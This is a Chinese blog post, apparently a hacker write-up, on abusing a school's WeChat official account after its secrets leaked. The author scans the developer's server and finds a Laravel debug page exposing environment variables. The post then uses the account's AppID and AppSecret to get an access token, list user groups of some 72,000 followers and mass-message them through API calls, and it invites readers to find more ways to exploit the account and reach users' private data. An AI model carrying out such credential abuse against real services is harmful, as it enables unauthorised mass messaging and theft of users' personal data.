【干货】微信私钥泄露之后，会发生什么？

前言学校有个比较知名的公众号，用了两年感觉还是非常不错的，查成绩查公交查图书啥都有

一个偶然的机会得到了公众号接口的权限，发现很多「有趣的事」，据说还可以黑产

应该是开发人员的个人博客，翻了一下没啥能用的信息

用nslookup查ip发现超时看，ping一下获得了ip地址，是阿里云的主机

nmap扫了一圈，发现开了mysql和phpmyadmin（在端口8181上）

访问IP报错但是没有找到好的利用姿势，于是直接用ip访问了一下，爆出大量错误信息！应该是使用了laravel的debug插件，但是没有及时关闭所导致的

如下图所示：右下角往下拉，可以看到包括所有laravel的环境变量都显示了出来，包括数据库信息

但是ip在内网，而且也不能用来登录mysql和myadmin

公众号可以使用AppID和AppSecret调用接口来获取access_token,于是我们获得的数据派上了用场

接口调用请求说明 http请求方式 : GET https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=APPID&secret=APPSECRET 返回了一串很长的token，以后调用接口都带上这个access_token参数即可，官方说有效期目前为2个小时，需定时刷新，重复获取将导致上次获取的access_token失效

参照官方文档，应该有很多利用姿势，毕竟能群发，能获取到用户地址之类的隐私数据，但是也有部分功能需要后台填写url地址才行，具体的大家可以研究下上面的文档，挖掘更多姿势，下面我就演示下影响比较大的群发

群发演示再次参照官方文档

想群发所有人，需要使用is_to_all参数，但是有次数限制，所以先查分组，使用分组发送

查询所有分组接口调用请求说明 http请求方式 : GET（请使用https协议） https://api.weixin.qq.com/cgi-bin/groups/get?access_token=ACCESS_TOKEN 返回说明正常时的返回JSON数据包示例： { ” groups “: [
{
” id “: 0 ,
” name “: “未分组” ,
” count “: 72596 },
{
” id “: 1 ,
” name “: “黑名单” ,
” count “: 36 },
{
” id “: 2 ,
” name “: “星标组” ,
” count “: 8 },
{
” id “: 104 ,
” name “: “华东媒” ,
” count “: 4 },
{
” id “: 106 ,
” name “: “★不测试组★” ,
” count “: 1 }]} 我使用文档里的接口调试工具演示这次的实例选其中人数最多的两组，id为0和104 根据分组进行群发【订阅号与服务号认证后均可用】接口调用请求说明 http请求方式 : POST https://api.weixin.qq.com/cgi-bin/message/mass/sendall?access_token=ACCESS_TOKEN POST数据说明 POST数据示例如下：文本： {
” filter “:{
” is_to_all “: false ,
” group_id “: “2” },
” text “:{
” content “: “CONTENT” },
” msgtype “: “text” } 官方文档这里的false后面少了个逗号是最骚的，我给大家加上